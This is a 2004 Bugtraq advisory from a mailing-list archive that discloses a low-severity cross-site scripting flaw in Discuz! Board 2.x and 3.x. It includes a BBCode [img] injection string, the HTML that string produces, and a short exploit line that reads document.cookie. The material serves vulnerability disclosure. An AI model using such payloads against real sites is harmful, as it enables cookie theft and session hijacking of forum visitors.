| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040205113814.26695.qmail@www.securityfocus.com>
Date: 5 Feb 2004 11:38:14 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: Possible Cross Site Scripting in Discuz! Board
Advisory Name:Possible Cross Site Scripting in Discuz! Board
Release Date: Feb 5,2004
Application: Discuz! Board
Version Affected: 2.x , 3.x
Platform: PHP
Severity: Low
Discover: Cheng Peng Su(apple_soup_at_msn.com)
Vendor URL: http://www.discuz.com/
################################################
Proof Of Concept:
A thread including:
[img]http://a.gif');(xss code);a=escape('a[/img]
will be
<img src="http://a.gif');(xss code);a=escape=('a" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" onmouseover="if(this.resized) this.style.cursor='hand';" onclick="if(this.resized) window.open('http://site/pic.gif');(xss code);a=escape('a');">
So there will be a red 'x' instead of a normal pic,if visitor click the red 'x',the code will be executed.
I think you know why i add " ;a=escape('a " after the xss code.
Exploit:
[img]http://a.gif');alert(document.cookie);a=escape=('a[/img]
Powered by blists - more mailing lists